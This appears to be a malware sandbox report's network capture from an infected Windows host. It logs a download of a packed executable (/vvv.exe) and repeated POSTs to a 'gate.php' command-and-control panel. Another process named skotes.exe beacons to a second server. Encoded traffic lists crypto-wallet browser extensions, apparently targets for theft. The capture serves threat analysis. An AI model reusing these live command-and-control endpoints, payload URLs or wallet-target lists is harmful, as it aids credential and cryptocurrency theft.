Dec 12, 2024 16:48:53.308432102 CET	1236	IN	Data Raw: 37 d3 e4 e4 8b f2 79 79 32 d5 e7 e7 43 8b c8 c8 59 6e 37 37 b7 da 6d 6d 8c 01 8d 8d 64 b1 d5 d5 d2 9c 4e 4e e0 49 a9 a9 b4 d8 6c 6c fa ac 56 56 07 f3 f4 f4 25 cf ea ea af ca 65 65 8e f4 7a 7a e9 47 ae ae 18 10 08 08 d5 6f ba ba 88 f0 78 78 6f 4a Data Ascii: 7yy2CYn77mmdNNIllVV%eezzGoxxoJ%%r\..$8WsQ#\|tt!>KKappB\|>>qffHHaa_j55WWiX':'8+3"iip3-"<
Dec 12, 2024 16:48:53.308448076 CET	1236	IN	Data Raw: fc 82 ca a6 e0 90 d0 b0 33 a7 d8 15 f1 04 98 4a 41 ec da f7 7f cd 50 0e 17 91 f6 2f 76 4d d6 8d 43 ef b0 4d cc aa 4d 54 e4 96 04 df 9e d1 b5 e3 4c 6a 88 1b c1 2c 1f b8 46 65 51 7f 9d 5e ea 04 01 8c 35 5d fa 87 74 73 fb 0b 41 2e b3 67 1d 5a 92 db Data Ascii: 3JAP/vMCMMTLj,FeQ^5]tsA.gZRV3mGa7zY<'a5zG<YUs?ys7S_[=oxDh>8$4,@_r%(<IA9qdV{a2pHl\tWB/SolutionC
Dec 12, 2024 16:48:53.308594942 CET	108	IN	Data Raw: ce 49 87 ce 55 ff aa 55 28 78 50 28 df 7a a5 df 8c 8f 03 8c a1 f8 59 a1 89 80 09 89 0d 17 1a 0d bf da 65 bf e6 31 d7 e6 42 c6 84 42 68 b8 d0 68 41 c3 82 41 99 b0 29 99 2d 77 5a 2d 0f 11 1e 0f b0 cb 7b b0 54 fc a8 54 bb d6 6d bb 16 3a 2c 16 50 00 Data Ascii: IUU(xP(zYe1BBhhAA)-wZ-{TTm:,Profile_FsbGV0
Dec 12, 2024 16:48:53.308607101 CET	1236	IN	Data Raw: 43 00 6d 00 5a 00 75 00 61 00 6d 00 68 00 74 00 61 00 32 00 68 00 6f 00 62 00 57 00 74 00 69 00 61 00 6d 00 74 00 72 00 59 00 57 00 4a 00 75 00 5a 00 47 00 4e 00 75 00 62 00 6d 00 39 00 6e 00 59 00 57 00 64 00 76 00 5a 00 32 00 4a 00 75 00 5a 00 Data Ascii: CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV0CmFpaWZibmJmb2JwbWVla2lwaGVlaWppbWRwbmxwZ3BwfFRlcnJhU3RhdGlvbg
Dec 12, 2024 16:48:53.308619022 CET	1236	IN	Data Raw: 68 00 75 00 5a 00 57 00 64 00 70 00 62 00 57 00 35 00 38 00 54 00 47 00 6c 00 78 00 64 00 57 00 46 00 73 00 61 00 58 00 52 00 35 00 56 00 32 00 46 00 73 00 62 00 47 00 56 00 30 00 43 00 6d 00 68 00 74 00 5a 00 57 00 39 00 69 00 62 00 6d 00 5a 00 Data Ascii: huZWdpbW58TGlxdWFsaXR5V2FsbGV0CmhtZW9ibmZuZmNtZGtkY21sYmxnYWdtZnBmYm9pZWFmfFhkZWZpV2FsbGV0CmxwZmNiamtuaWpwZWVpbGxpZm5raWtn
Dec 12, 2024 16:48:53.428169966 CET	1236	IN	Data Raw: 46 00 6e 00 62 00 57 00 5a 00 77 00 5a 00 6d 00 4a 00 76 00 61 00 57 00 56 00 68 00 5a 00 6e 00 78 00 59 00 5a 00 47 00 56 00 6d 00 61 00 56 00 64 00 68 00 62 00 47 00 78 00 6c 00 64 00 41 00 70 00 73 00 63 00 47 00 5a 00 6a 00 59 00 6d 00 70 00 Data Ascii: FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdm

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.10	49983	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:48:54.636282921 CET	232	OUT	GET /vvv.exe HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Dec 12, 2024 16:48:55.964843035 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:48:55 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Thu, 12 Dec 2024 05:59:50 GMT ETag: "2e9600-6290c6c1b377a" Accept-Ranges: bytes Content-Length: 3053056 Connection: close Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 03 00 00 00 00 00 00 f6 8e 00 00 00 00 00 f0 00 22 00 0b 02 03 00 00 a0 2e 00 00 10 00 00 00 70 66 00 30 04 95 00 00 80 66 00 00 00 40 00 00 00 00 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 30 95 00 00 02 00 00 00 00 00 00 02 00 60 81 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 20 95 00 9c 00 00 00 00 00 00 00 00 00 00 00 00 c0 91 00 54 95 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd".pf0f@0` TUPX0pfUPX1.f.@UPX2 .@4.24UPX!$V9uv%.I5<Pm\|EB2@^1sMwG3BTIX`("U{"7Ne(=((sWDd;{Os/0&p`PNwS%2S?87x+vJt(>./zosczy,v$j]MRdh1a}}h-=U4}yQ:GQ2]0[^=K?/>SZ9pvuwOnm%Euq^n <gCOUQBZ<x%THnb<oS
Dec 12, 2024 16:48:55.964911938 CET	1236	IN	Data Raw: ff cd f3 68 2e 2c b3 78 64 6e d2 44 26 56 72 6c cd 17 fe f5 da 8a de 9b 23 04 72 c6 b9 8a 38 12 e6 45 01 fa 74 97 2b 0a 7d 65 97 6b 0c 8e d1 d1 47 fe 49 ec fb b2 6f 3a a1 6f 52 15 bf 77 f8 cf 97 3f 4a d5 f1 6e 97 81 bb bc bb f4 67 c4 c4 59 2a 59 Data Ascii: h.,xdnD&Vrl#r8Et+}ekGIo:oRw?JngYYT%tfXkM\(.r!zR_\|<xL=x:8Tu2#cOS86q2Ll, yK(^zgx<)W.=Y^1G
Dec 12, 2024 16:48:55.964917898 CET	448	IN	Data Raw: 3e 3e fd ca cc 06 71 de b3 b0 65 a5 ab af 34 b4 6e f5 9e 64 ef 71 ec 17 09 70 36 cb af 09 9a 56 0a 07 a4 96 5e b3 3a 0b 96 ab c4 0e dd cb 21 fd 81 16 b2 ae cc d7 91 14 28 37 64 cf 78 bc ff 4f 5b 66 eb e1 3c d2 0e 7f 07 8c 3f 6a 97 6b 79 fb cd 66 Data Ascii: >>qe4ndqp6V^:!(7dxO[f<?jkyf&>,122vCqsq{N{3XTK(TgJv97bQ<wi}V+o$_W81[NI=?YANJA{\|ugR
Dec 12, 2024 16:48:55.965085030 CET	1236	IN	Data Raw: e6 24 14 37 a3 7d 0f 47 19 86 5d df 02 ce 9b 9d 1e ba bb 40 90 8e 4f bd 7d f3 0d ee dd ca c0 7c 0f 5e b2 0d 57 0c d4 78 a3 b8 76 8f 7a 75 d0 1f d4 09 53 b5 7b de 98 61 4d dd 37 df cb fe fc a6 f9 19 11 b7 0c ca d2 44 85 22 ab 5c 16 3a 87 71 b3 e8 Data Ascii: $7}G]@O}\|^WxvzuS{aM7D"\:q`2ct-lYiay\|3h T[jGHmH+mkV(Ls7"l'LrIpJ*9;9(_&A#
Dec 12, 2024 16:48:55.965090990 CET	1236	IN	Data Raw: 59 88 8e 4d 9f 2f 5e dc b2 5f ff 57 33 de ba 1d b4 f1 2c d7 1d b9 a4 49 48 0e 5f 86 67 ec 2f 44 27 b2 9e b7 0f e7 7d 50 aa d6 f1 56 45 30 0f b8 05 45 5e ef fa 83 ad cc 59 56 92 ab bd 0e 86 27 71 6d ac b9 da 81 d6 31 d5 52 88 6b b9 c0 39 ce 8f 80 Data Ascii: YM/^_W3,IH_g/D'}PVE0E^YV'qm1Rk9(oEU%6GE+k!Or(R<!\|E4=8C;~ZLhk{,u=mS8G4$7\|wK/ELs/f.KP'$wbk$)
Dec 12, 2024 16:48:55.965096951 CET	1236	IN	Data Raw: 11 a8 82 df 97 7c 0c 6f 86 12 14 3b 1f f4 29 46 6c c2 d9 48 b4 49 4b 98 72 20 dc 45 19 c0 60 19 bf 0c 58 93 86 f7 7e 34 f7 e1 cc 26 21 e9 8e 7a 5f 01 3c fc e7 49 1a 46 c7 ac 58 db 40 88 2b 69 bd eb 41 8d ea 24 25 93 27 de e0 b1 2b cc 5d 86 bf 4a Data Ascii: \|o;)FlHIKr E`X~4&!z_<IFX@+iA$%'+]J0m@MK2&R<j\vQb{1M^3Yh=xSE/?$AmX5mS=,`l}6~0n}T*5uGXYt
Dec 12, 2024 16:48:55.965107918 CET	1236	IN	Data Raw: a9 8d 03 2e 61 7a 19 9e 1d c8 22 5e 17 c4 0a 85 d0 c6 d7 57 d2 3f 56 6e 02 a2 77 6f 90 0a 89 83 9d ef 36 02 f2 f3 73 82 6f 53 57 7e 8d 26 a2 d6 e8 92 fc c7 1c d8 b0 bb 22 f0 97 f1 bb ec 22 54 0d 69 1d 02 d7 4d f7 23 81 a0 86 82 77 25 05 d3 ed fc Data Ascii: .az"^W?Vnwo6soSW~&""TiM#w%S"`bvnIwOz_\*+1Lb/FJ&-kLt2eHea^rKe(K'>692A8cwywo8ICD W>~?:hGVSH:CsZ-8CC-]
Dec 12, 2024 16:48:55.965244055 CET	1236	IN	Data Raw: 97 c8 91 cf 4b e7 bb 68 7d d8 9b ea 46 9e f6 28 0f 99 d4 26 ee 21 27 ea 46 f0 7a 16 8e 8d 84 42 2d dd 9e c3 b7 b2 fb 3f 14 28 74 40 49 0b 93 95 78 ee 32 e1 00 95 a1 12 d1 0b 1a f4 2b c2 7b ee 08 d6 93 7a a0 90 90 01 b6 45 a0 44 35 d0 76 20 fb 92 Data Ascii: Kh}F(&!'FzB-?(t@Ix2+{zED5v [EcpnFv7h+^~EP'2JeG/e'(k~#%*4J-_lfoD(U?q93)ncE~
Dec 12, 2024 16:48:55.965289116 CET	1236	IN	Data Raw: 36 9f 13 eb 78 54 82 4d 56 54 71 87 88 bf fb 9e 1b 91 3a e0 f0 dc 55 4d 3b c1 d2 87 8d 88 81 07 4e 33 e8 53 3a a2 93 ea 01 68 4a c4 eb 81 13 2f 97 23 35 0d 03 0c c4 dc 0f 46 b4 3f c2 a8 1f 5e 29 dd 25 d8 4e 0d 5d 6f 3f aa b8 07 26 cf 7f 03 8e 09 Data Ascii: 6xTMVTq:UM;N3S:hJ/#5F?^)%N]o?&2M7}%qQR%XZ,BD+/HA1HQ[4C2_325(=LAQ4AQ}vY#>3Nr3B=8l^qnZRB[l
Dec 12, 2024 16:48:55.965296030 CET	1236	IN	Data Raw: d0 e6 9f 4d fe 3c cd 3c e8 36 b0 d0 e4 91 17 bf 59 d3 87 08 b1 57 9b 1a b0 df b7 ea a4 61 1e ae ac bc a7 96 dd 02 71 94 a9 f4 c4 c7 2c 0a 6e c3 fa 82 55 a1 f6 ca 76 f5 c9 3a 5b 16 94 0c 0c 41 17 74 02 05 4b 4a f8 50 ff 11 99 08 c6 83 68 29 bb 89 Data Ascii: M<<6YWaq,nUv:[AtKJPh)T.tP-n4~+l[+SMvv?~[l3dTH#?-]KZ:Nk!N4`',\|kI\suzL9o~>ANgA"m2z5IB{D`h4
Dec 12, 2024 16:48:56.085046053 CET	1236	IN	Data Raw: b0 77 7d 25 0a 01 50 f0 c7 d6 ab ea 4f 7b 39 9b 93 82 b3 d6 cf 90 52 39 77 0d 15 2d 82 ea 92 23 68 50 0e 90 56 03 21 91 21 2c f5 6b a4 1b 8e 4b c0 fd 0f 0b 29 01 69 66 40 7e ea 56 a1 66 d7 0b cc 65 9a ea 5b 87 ef c4 0d 48 28 17 cc c6 6b 04 19 ab Data Ascii: w}%PO{9R9w-#hPV!!,kK)if@~Vfe[H(k_;YMNDKmU~e6[jdumS\|<#upmX7O( )z!/o8bUl}E}zAtNN_&_C{j]pY r ["/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.10	49989	185.81.68.147	80	5632	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:48:56.475855112 CET	264	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Dec 12, 2024 16:48:57.804702997 CET	257	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:48:57 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 40 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 35 32 36 62 39 30 39 36 37 61 31 62 37 35 39 39 36 34 30 35 34 64 32 30 62 37 36 65 36 66 34 66 35 37 34 31 63 31 64 62 Data Ascii: 526b90967a1b759964054d20b76e6f4f5741c1db

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.10	49996	185.81.68.147	80	5632	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:48:57.933981895 CET	284	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 10
Dec 12, 2024 16:48:58.053827047 CET	10	OUT	Data Raw: 72 57 42 2b 57 5a 5c 55 43 12 Data Ascii: rWB+WZ\UC
Dec 12, 2024 16:48:59.570924997 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:48:58 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 38 64 61 34 0d 0a 4e 3f 3c 6f 33 10 19 16 17 43 44 10 5b 6a 5b 55 57 57 5b 59 5d 17 46 12 58 17 6d 45 14 4c 5b 05 46 47 1e 1f 49 13 48 42 17 18 45 1b 54 53 13 18 54 0e 5c 48 15 19 19 1b 1c 57 5c 5c 51 0a 46 43 48 19 51 0a 59 01 58 03 1b 54 5b 5c 49 13 48 42 17 18 42 07 55 55 54 53 43 13 48 4c 5a 5a 43 50 5a 58 51 1b 5b 16 55 1a 40 1b 16 47 1c 15 55 00 50 55 46 5e 14 42 0d 0c 52 1c 51 0d 56 57 55 53 19 02 5e 0f 1d 17 15 19 14 1e 43 50 46 12 5b 53 07 44 18 08 59 1c 5d 0a 59 56 1a 52 0c 5c 4e 40 19 12 14 0b 57 53 56 5b 5e 0f 56 4c 43 50 55 5c 5b 51 44 47 4d 4a 5f 5f 18 5e 5a 09 57 48 5b 14 52 15 18 11 41 1b 03 0d 5a 55 5a 07 4f 59 5d 53 58 4f 52 0d 5a 1f 1b 15 16 16 44 47 55 0a 41 5c 03 43 53 4b 51 09 5b 01 59 52 55 41 0a 42 4a 01 5a 5f 14 4e 19 12 13 5a 52 0f 52 10 19 5a 4b 5e 1c 16 1c 15 16 4e 5e 5f 05 1a 43 15 5a 09 55 02 18 58 47 1f 0b 5e 1d 0d 43 57 44 11 5c 1e 5a 59 5a 4b 13 4e 17 17 5b 08 18 5a 55 59 1a 03 5d 5f 05 1d 14 49 16 44 1e 10 1b 54 58 50 11 58 10 1b 1b 5f 45 48 1b 1c 19 14 1d 05 5f 11 [TRUNCATED] Data Ascii: 8da4N?<o3CD[j[UWW[Y]FXmEL[FGIHBETST\HW\\QFCHQYXT[\IHBBUUTSCHLZZCPZXQ[U@GUPUF^BRQVWUS^CPF[SDY]YVR\N@WSV[^VLCPU\[QDGMJ__^ZWH[RAZUZOY]SXORZDGUA\CSKQ[YRUABJZ_NZRRZK^N^_CZUXG^CWD\ZYZKN[ZUY]_IDTXPX_EH_VVTNJX[OJDN[DDQYkl;B:?4<F[^RUEDF8=C?o?B;=A<hN9nBEFFBF]AD@V]X\HPYYL\UTWHCQWZBQ^TEDk?CDB@IQM^[@4<DBGAV9VXZE_@?<BABn43DBE9lCDBBPVj[\P[BP^AWAEQPEPj@__K[U6RY\TW@YDAn\h<FFCDBBPX]RXQWQVE9UQhZDmFBGD\HMkCRYSP^U@EVUC__U\XZDY[SMlO^DEXWW\TGl@[WSk\RXU?Z,@_K_rRArEA\G@TZZVTZX[GAECEPj@MUABkCVAM\DZi?[j9FBYBQ?8@\W\eTCh[LTjXU^UPB:WkXnSlVEQZZLElhFQCYYFVCmA^i]eTCh[LTjVXAC_kYYKVXZE^B[G[KYZjACCXUCQGQQDASXjDRGZXeP_WP
Dec 12, 2024 16:48:59.570950031 CET	1236	IN	Data Raw: 41 4c 53 6b 43 0f 5e 5b 54 5b 5c 5a 14 56 5a 46 59 6e 12 07 4f 46 3a 52 07 40 03 69 15 14 43 15 1c 10 07 4d 46 0b 3e 1b 53 56 58 51 08 56 4c 56 45 49 17 5f 50 55 5b 40 0d 54 59 01 56 42 0c 59 08 1a 08 40 5a 57 5d 0a 54 0a 16 69 10 08 51 17 10 05 Data Ascii: ALSkC^[T[\ZVZFYnOF:R@iCMF>SVXQVLVEI_PU[@TYVBY@ZW]TiQEG_BTYXJElXPUhPSP:pPTDWNPBXB^_^FIXXXPUXACMA8@AWNeFVEE[eo9l@@ZQ[ihC_Pj@\HIiSEkTWL\PZFX_kT:FF^NT^mFSnBXEMY
Dec 12, 2024 16:48:59.570961952 CET	448	IN	Data Raw: 03 06 3e 1b 10 58 43 43 0e 57 0d 54 40 4a 04 6a 16 6c 17 14 05 47 44 0d 54 59 17 44 03 57 12 08 6b 16 5e 05 57 38 40 15 5b 52 5f 65 12 5a 57 45 05 6e 0c 42 58 65 1b 16 57 5c 54 47 17 0f 6c 40 51 59 17 5b 4b 57 09 5b 43 46 5e 0f 11 0a 17 58 57 44 Data Ascii: >XCCWT@JjlGDTYDWk^W8@[R_eZWEnBXeW\TGl@QY[KW[CF^XWDZlEVYL\FUTW[FjGPF^Pe]TF_LUe]]UPUP[BhFWHhRBhDEBTnV^__POPGP]SZD\RQQ^YAV[]TE8@BCIWYARVFJj\TV^o^SR:XqV@TCUCMB_
Dec 12, 2024 16:48:59.571131945 CET	1236	IN	Data Raw: 0d 44 07 1a 47 5c 58 55 40 59 43 51 59 6e 12 04 58 44 08 18 0f 50 32 50 5b 51 5c 02 45 0d 13 40 57 6a 40 07 0c 55 57 55 04 5d 42 51 5a 4b 04 6a 16 53 43 42 38 10 10 10 41 1b 11 53 1e 40 5b 69 15 57 5e 0d 57 0d 05 1b 53 46 12 17 59 5d 53 59 15 58 Data Ascii: DG\XU@YCQYnXDP2P[Q\E@Wj@UWU]BQZKjSCB8AS@[iW^WSFY]SYX^VXM_[^Z_S^SB:XAQZJCjPRYf__Q\QhFs4aJEU]S_IEMCAiMSLDiDBQCSX[hDn>8@DWLUj=BYTT\hVBnBZWZZA_mAT>ECUjP>
Dec 12, 2024 16:48:59.571204901 CET	1236	IN	Data Raw: 55 55 08 17 5d 1e 06 5e 43 07 05 54 46 0e 09 50 0d 44 10 01 5b 57 16 45 5b 68 44 54 42 40 59 4e 52 17 4f 56 5d 58 16 5c 5e 4d 16 17 12 46 0f 68 5c 57 49 43 40 1d 56 5b 0a 46 51 0b 59 53 17 6a 44 0a 46 09 5e 5a 41 16 45 44 0b 51 0f 6a 40 4c 43 5c Data Ascii: UU]^CTFPD[WE[hDTB@YNROV]X\^MFh\WIC@V[FQYSjDF^ZAEDQj@LC\DhU>WX[QiJ@=SWS:FANDT^mFPJB>ZZVB_kJN[kY[DFESiFFD_XO\\FMlVETTIPBU\\Nl@YYS:FTB@^^PQB_eVPQ=BVGPXXQWQl@tYSFW\RZE?DYSUQ_UR
Dec 12, 2024 16:48:59.571216106 CET	1236	IN	Data Raw: 10 46 03 4d 58 1b 0c 17 43 1b 40 1b 38 33 19 16 14 10 15 14 44 12 10 42 15 41 00 54 39 57 09 5b 43 51 5f 17 13 5e 6f 3f 12 16 42 19 10 19 16 17 41 11 39 3a 3f 19 19 16 14 10 15 14 44 12 10 42 17 16 1e 3b 6c 14 46 15 17 14 11 43 11 44 42 15 12 16 Data Ascii: FMXC@83DBAT9W[CQ_^o?BA9:?DB;lFCDBBRVP=UP_VDQF[T_kWGZSQ<TZ@{JCXQR=BVGPX\YQP\>BChD<iDBBABPW\QSA^^R@X\A_AXTUjPSjWL[VUGhFSVE:YDCGPU
Dec 12, 2024 16:48:59.571355104 CET	1236	IN	Data Raw: 6d 38 00 05 4a 6d 03 14 56 78 1b 71 51 1c 5b 6a 4e 0d 09 4b 68 6c 57 1b 03 12 6d 59 17 55 0a 58 15 40 46 59 43 57 63 06 56 01 1a 50 41 16 5f 19 6b 19 19 6b 3d 53 4a 7b 49 74 45 5a 40 53 04 1d 3f 53 1d 18 76 1b 2d 7c 4b 7a 36 18 6d 04 1c 5a 6c 1f Data Ascii: m8JmVxqQ[jNKhlWmYUX@FYCWcVPA_kk=SJ{ItEZ@S?Sv-\|Kz6mZlP[DleT?ZVXGD@JbPSS[l?mJaNBKbQLvLy({ilikj;P^D[FLUKOd]TAVKwX\NLQYsWRX^DWZLZXPZS/^RF_YFuTW^SSEX^RK_
Dec 12, 2024 16:48:59.571367025 CET	1236	IN	Data Raw: 17 14 11 43 11 44 42 15 12 16 42 19 12 5d 57 43 00 6e 00 52 53 56 4b 53 16 0a 15 16 58 1d 44 0b 43 5a 00 08 44 18 6b 3f 17 14 11 43 11 44 42 15 12 16 42 19 12 50 58 5d 04 52 16 15 0f 19 1b 0a 47 53 47 5d 14 46 0e 04 42 58 06 42 0f 5b 08 15 45 51 Data Ascii: CDBB]WCnRSVKSXDCZDk?CDBBPX]RGSG]FBXB[EQAPt^Z#]TKSDT[\NwPTGQAU[FCSR6RWNJlA>kWbmnUIY]OMwH~,(enN9QMjkejVVL98=UKOvy)*2hOmBM[JeeTWi_SYE@gRST
Dec 12, 2024 16:48:59.571377039 CET	1120	IN	Data Raw: 3f 50 50 03 00 61 69 04 4b 00 36 06 5a 05 33 74 07 73 4f 45 07 02 54 10 19 19 4d 44 4c 0a 15 13 30 70 5d 01 65 4f 5d 74 51 06 11 40 62 60 7f 55 70 2f 27 64 00 7e 16 6a 5b 0d 0e 50 0f 04 10 5f 45 7b 1e 16 49 0b 15 47 01 46 79 0c 43 53 17 40 07 58 Data Ascii: ?PPaiK6Z3tsOETMDL0p]eO]tQ@b`Up/'d~j[P_E{IGFyCS@XN]E^W\qUZvURFJ\E^PC%VTRESJ_G[F4<ABH9nBkh<FIJ8=9;CJihBEKZ[@DAXRSSZYF=hEDDA_CN@?<B@S=TZWMSZDDi=hEFF
Dec 12, 2024 16:48:59.571491957 CET	1236	IN	Data Raw: 03 1a 12 50 4f 40 72 0c 5f 10 07 5b 46 16 5f 19 5e 56 52 52 4f 45 07 4f 41 7a 56 58 40 55 5b 40 4a 40 55 12 5b 57 06 53 4e 46 03 52 52 4c 1d 43 5f 01 15 74 56 52 10 5c 43 4a 53 44 4f 45 10 4f 1c 02 19 4b 1d 0b 15 49 44 4f 19 59 17 5f 03 16 4e 51 Data Ascii: PO@r_[F_^VRROEOAzVX@U[@J@U[WSNFRRLC_tVR\CJSDOEOKIDOY_NQTXPB(FFBB\Z]DFuPE@S[wQ_ZG{VYTCZBN_ZZVB,VX\B[\|ZC@sDSMH]V[AUBLED@U]UAJBRYZZUCFxADLESYQNV[UBPBDDALBJKSZZFRA$RF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.10	49998	185.81.68.147	80	504	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:48:59.210993052 CET	264	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Dec 12, 2024 16:49:00.539519072 CET	257	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:48:59 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 40 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 35 32 36 62 39 30 39 36 37 61 31 62 37 35 39 39 36 34 30 35 34 64 32 30 62 37 36 65 36 66 34 66 35 37 34 31 63 31 64 62 Data Ascii: 526b90967a1b759964054d20b76e6f4f5741c1db

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.10	49999	185.215.113.43	80	7820	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:48:59.325145960 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 34 34 34 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014442001&unit=246122658369
Dec 12, 2024 16:49:00.649497986 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 15:49:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.10	50008	185.81.68.147	80	504	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:00.661220074 CET	284	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 10
Dec 12, 2024 16:49:00.782649040 CET	10	OUT	Data Raw: 72 57 42 2b 57 5a 5c 55 43 12 Data Ascii: rWB+WZ\UC
Dec 12, 2024 16:49:02.231893063 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:49:01 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 38 64 61 34 0d 0a 4e 3f 3c 6f 33 10 19 16 17 43 44 10 5b 6a 5b 55 57 57 5b 59 5d 17 46 12 58 17 6d 45 14 4c 5b 05 46 47 1e 1f 49 13 48 42 17 18 45 1b 54 53 13 18 54 0e 5c 48 15 19 19 1b 1c 57 5c 5c 51 0a 46 43 48 19 51 0a 59 01 58 03 1b 54 5b 5c 49 13 48 42 17 18 42 07 55 55 54 53 43 13 48 4c 5a 5a 43 50 5a 58 51 1b 5b 16 55 1a 40 1b 16 47 1c 15 55 00 50 55 46 5e 14 42 0d 0c 52 1c 51 0d 56 57 55 53 19 02 5e 0f 1d 17 15 19 14 1e 43 50 46 12 5b 53 07 44 18 08 59 1c 5d 0a 59 56 1a 52 0c 5c 4e 40 19 12 14 0b 57 53 56 5b 5e 0f 56 4c 43 50 55 5c 5b 51 44 47 4d 4a 5f 5f 18 5e 5a 09 57 48 5b 14 52 15 18 11 41 1b 03 0d 5a 55 5a 07 4f 59 5d 53 58 4f 52 0d 5a 1f 1b 15 16 16 44 47 55 0a 41 5c 03 43 53 4b 51 09 5b 01 59 52 55 41 0a 42 4a 01 5a 5f 14 4e 19 12 13 5a 52 0f 52 10 19 5a 4b 5e 1c 16 1c 15 16 4e 5e 5f 05 1a 43 15 5a 09 55 02 18 58 47 1f 0b 5e 1d 0d 43 57 44 11 5c 1e 5a 59 5a 4b 13 4e 17 17 5b 08 18 5a 55 59 1a 03 5d 5f 05 1d 14 49 16 44 1e 10 1b 54 58 50 11 58 10 1b 1b 5f 45 48 1b 1c 19 14 1d 05 5f 11 